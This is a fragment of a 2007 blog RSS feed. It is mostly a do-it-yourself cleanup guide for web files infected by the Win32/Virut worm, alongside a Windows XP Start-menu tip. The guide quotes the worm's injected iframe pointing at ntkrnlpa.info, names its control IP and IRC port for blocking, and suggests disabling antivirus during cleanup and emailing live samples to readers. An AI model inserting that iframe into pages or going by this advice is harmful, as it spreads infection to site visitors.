<p class="wlWriterSmartContent" id="scid:887EC618-8FBE-DEAD-BEEF-2339AF2EC721:09869bfd-b980-4a79-bf7a-7742796f95e1" style="margin: 0px; padding: 0px; display: inline"><a href="http://blog.kakkoi.net/wp-content/uploads/2007/11/kittehfingering.8x61.jpg" title="Tilt -10" rel="thumbnail"><img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/kittehfingering1.jpg" border="0" /></a></p>
<p>Photo courtesy of <a href="http://blog.kaizeku.com" title="Kaizeku Ban" rel="friends">ChaosKaizer</a></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/live-writer/windows-livewriter-polaroid-plugins/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sort Start menu in Alphabetical order</title>
		<link>http://42.kaizeku.com/windows/sort-start-menu-in-alphabetical-order/</link>
		<comments>http://42.kaizeku.com/windows/sort-start-menu-in-alphabetical-order/#comments</comments>
		<pubDate>Thu, 15 Nov 2007 17:56:22 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/sort-start-menu-in-alphabetical-order/</guid>
		<description><![CDATA[Start menu and Favorites menu are not listed in alphabetical order]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I&#8217;d many programs installed in my PC (windows XP) within time, the start menu is getting clutter.</p>
<p>so here how you sort the menu in Alphabetical order for windows XP. Its actually pretty easy.</p>
<ol>
<li>Start &gt; All Programs &gt; Select &#8220;Any programs&#8221;.</li>
<li>Right Click and Select &#8220;Sort By Name&#8221;.</li>
</ol>
<p>For different version of windows you can digg it at <a href="http://support.microsoft.com/kb/177482">Microsoft KB177482</a></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/sort-start-menu-in-alphabetical-order/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Fixes for files infected with Win32/virut.Virtob and Variants</title>
		<link>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/</link>
		<comments>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/#comments</comments>
		<pubDate>Mon, 12 Nov 2007 12:35:30 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[A.gen]]></category>

		<category><![CDATA[Eldorado]]></category>

		<category><![CDATA[limpiar]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[Ofinpa.A]]></category>

		<category><![CDATA[Vipre]]></category>

		<category><![CDATA[Virtob]]></category>

		<category><![CDATA[virustotal]]></category>

		<category><![CDATA[Virut]]></category>

		<category><![CDATA[Virut.at]]></category>

		<category><![CDATA[Virut.Gen]]></category>

		<category><![CDATA[Virut.NAV]]></category>

		<category><![CDATA[Win32 Virus]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/fixed-for-files-infected-with-virutnat-mefir/</guid>
		<description><![CDATA[

I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. 

Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a search and replace tools for [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="summary"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY3MTAxMQ.curie,80,302" rel="external nofollow" rev="shareapic:webicons"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004671011.png" width="130" height="130" alt="Activity Monitor Virus Icons" class="fl" /></a>I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. </p>
<p><span id="more-5"></span></p>
<p>Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a <a href="http://blog.kakkoi.net/windows/fixed-for-files-infected-with-virutnat-mefir#search-and-replace-tools">search and replace tools</a> for removing the embed code inside the infected files.</p>
<ol class="xoxo" style="color:#444">
<li>Make sure all of the infected (*.exe win32/virtob) files has been quarantine.</li>
<li>Optionally block outbound access to <tt>78.109.19.139:80</tt> &amp; irc port <tt>65520</tt> in your firewall settings.</li>
<li>Disabled AntiVirus if any.</li>
<li>Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).</li>
<li><a href="#search-and-replace-tools">Search</a> all files with <tt>*.htm, *.html, *.php, *.asp</tt> extensions.<br />
<strong>delete or replace</strong> the following text (strings)</p>
<pre>
&lt;iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"&gt;&lt;/iframe&gt;</pre>
</li>
</ol>
<h2 id="search-and-replace-tools" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Search and Replace Tools</h2>
<ul class="xoxo" style="color:#555">
<li>For windows - there is lots of similar tools and I&#8217;m not sure which one to recommend as it seem most did the same thing so Google for <a href="http://www.google.com/search?q=search-and-replace&amp;ie=utf-8&amp;oe=utf-8">&#8220;search-and-replace&#8221;</a> pick your best. </li>
<li>For Cygwin or *nix bash console - Used <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;hs=ms3&#038;q=Find+and+replace+%22sed%22&#038;btnG=Search" rel="nofollow">sed</a> commands to search &#038; replace strings in all infected files.</li>
<li> Python in windows - You can try <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;q=python+Find+and+replace+string+in+file+&#038;btnG=Search">this solutions</a>.</li>
</ul>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Win32/Virut Virustotal.com Results</h2>
<table border="0">
<tr>
<th>Antivirus</th>
<th>Version</th>
<th>Last Update</th>
<th>Result</th>
</tr>
<tr>
<td>AhnLab-V3</td>
<td>2007.11.12.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>AntiVir</td>
<td>7.6.0.34</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.AF</td>
</tr>
<tr>
<td>Authentium</td>
<td>4.93.8</td>
<td>2007.11.10</td>
<td>-</td>
</tr>
<tr>
<td>Avast</td>
<td>4.7.1074.0</td>
<td>2007.11.11</td>
<td style="color: red">Win32:Virtob</td>
</tr>
<tr>
<td>AVG</td>
<td>7.5.0.503</td>
<td>2007.11.11</td>
<td style="color: red">Win32/Virut</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.6.Gen</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>9.00</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.K</td>
</tr>
<tr>
<td>ClamAV</td>
<td>0.91.2</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut-5</td>
</tr>
<tr>
<td>DrWeb</td>
<td>4.44.0.09170</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.19</td>
</tr>
<tr>
<td>eSafe</td>
<td>7.0.15.0</td>
<td>2007.11.08</td>
<td>-</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>31.2.5289</td>
<td>2007.11.12</td>
<td style="color: red">Win32/Virut.6375</td>
</tr>
<tr>
<td>Ewido</td>
<td>4.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>FileAdvisor</td>
<td>1</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Fortinet</td>
<td>3.11.0.0</td>
<td>2007.10.19</td>
<td style="color: red">W32/Virut.AE</td>
</tr>
<tr>
<td>F-Prot</td>
<td>4.4.2.54</td>
<td>2007.11.10</td>
<td style="color: red">W32/Injector.A.gen!Eldorado</td>
</tr>
<tr>
<td>F-Secure</td>
<td>6.70.13030.0</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>Ikarus</td>
<td>T3.1.1.12</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.AS</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>7.0.0.125</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>McAfee</td>
<td>5160</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.g</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.3007</td>
<td>2007.11.12</td>
<td style="color: red">Virus:Win32/Virut.Q</td>
</tr>
<tr>
<td>NOD32v2</td>
<td>2653</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Norman</td>
<td>5.80.02</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.W</td>
</tr>
<tr>
<td>Panda</td>
<td>9.0.0.4</td>
<td>2007.11.11</td>
<td style="color: red">W32/Virutas.W</td>
</tr>
<tr>
<td>Prevx1</td>
<td>V2</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Rising</td>
<td>20.18.02.00</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.z</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.23.0</td>
<td>2007.11.12</td>
<td style="color: red">W32/Vetor-G</td>
</tr>
<tr>
<td>Sunbelt</td>
<td>2.2.907.0</td>
<td>2007.11.09</td>
<td style="color: red">VIPRE.Suspicious</td>
</tr>
<tr>
<td>Symantec</td>
<td>10</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.W</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.2.9.124</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.gen</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.12.2.4</td>
<td>2007.11.11</td>
<td>-</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.3.26:9</td>
<td>2007.11.11</td>
<td style="color: red">Win32.Virut.Gen.4</td>
</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>6.0.1</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.AF</td>
</tr>
<tr>
<td colspan="4"></td>
</tr>
</table>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Notes on Microsoft Windows Malicious Software Removal Tool</h2>
<p><em>Update On: Nov,20 2007 by NoahArk</em><br />
I have <strong>Win.32/virut</strong> files in my archive (for backup purpose). Last week I installed <a title="Windows Malicious Software Removal tool" href="http://blog.kakkoi.net/uri/d3d3Lm1pY3Jvc29mdC5jb20vZG93bmxvYWRzL2RldGFpbHMuYXNweD9GYW1pbHlJZD1BRDcyNEFFMC1FNzJELTRGNTQtOUFCMy03NUI4RUIxNDgzNTY.curie,80,302">Microsoft Windows Malicious Software Removal tool v1.35</a> (Nov 13, 2007, KB890830).</p>
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/microsoft-malicious-software-removal-tool.gif" alt="Microsoft Malicious Software Removal Tool" style="margin: 0pt 5px 1px 0pt; float: left" /> Microsoft&#8217;s <a href="http://blog.kakkoi.net/uri/c3VwcG9ydC5taWNyb3NvZnQuY29tLz9rYmlkPTg5MDgzMA.curie,80,302" title="Microsoft Knowledge Base">claimed</a> this tool can fixes <em>w32/Virut</em> . But the results is much worsed than I expected. It doesn&#8217;t detect <strong>Win32/Virut </strong>on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob &amp; Virut[A-W] (infecting *.exe &amp; *.html). I&#8217;d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.</p>
<p>I still keep the infected Win32/Virut files, if anyone need it please send an email to <img src="http://i.kakkoi.net/nhnoah-gmail.png" alt="nhnoah email" width="144" height="21" title="gmail" />. My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client&#8217;s (including me) wont have to hunt down on pricey antivirus solutions. </p>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">W32/Virut and ntkrnlpa.info</h2>
<blockquote><p>The worms started spreading since <span style="color:#444">September 2006</span>. After one year anniversay It still in the wild like it will never stop. </p></blockquote>
<p>I&#8217;d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url. </p>
<p>This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.</p>
<p> Based on wikipedia <a href="http://en.wikipedia.org/wiki/Usage_share_of_web_browsers">&#8220;Usage share of Web Browser Statistics&#8221;</a>, <strong>81%</strong> of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn&#8217;t blocked IFRAME that can be a problem. </p>
<p>Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening. </p>
<h2 id="related-post" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Related Entries</h2>
<ul class="xoxo">
<li><a href="http://blog.kakkoi.net/virus/how-to-safeguard-your-windows-when-cleaning-files-infected-by-win32-virus/"> Tips on How to safeguard your Windows when cleaning files infected by win32 virus.</a></li>
<li> <a href="http://blog.kakkoi.net/windows/how-to-block-website-without-using-firewall/"> How to Block Acces to Unsavory Websites Without using Firewall or third party software</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/feed/</wfw:commentRss>
		</item>
		<item>
		<title>win32.virut Bad day for web developer</title>
		<link>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/</link>
		<comments>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/#comments</comments>
		<pubDate>Sun, 11 Nov 2007 23:20:31 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[ranting]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[virut.nat]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/one-really-bad-worm-for-web-developer/</guid>
		<description><![CDATA[

Just after my previous cleanup, now i got much worse virus on my PC its called Worm.Win32.Mefir [a-z] by both Norton Antivirus (Symantec) &#38; Avast (Alwil Software) NOD32 identified it as Win32/Virut.NAT
At the time being It infected *.html &#38; *.php files and probably all text/html types. There is no cure yet. I hated this worms [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Just after my <a href="http://blog.kakkoi.net/virus/w32virutw/">previous cleanup</a>, now i got much worse virus on my PC its called <strong>Worm.Win32.Mefir</strong> [a-z] by both Norton Antivirus (Symantec) &amp; Avast (Alwil Software) NOD32 identified it as <strong>Win32/Virut.NAT</strong></p>
<p>At the time being It infected *.html &amp; *.php files and probably all text/html types. There is no cure yet. I hated this worms I&#8217;d lost few project because of this. Try archive (LZMA) all your web projects before hand. Its spreading like wild fire.</p>
<p>I havent try cleaning the infected files with Trend HouseCall Online Scans. Just hope there is cure for this worm. damn damn</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
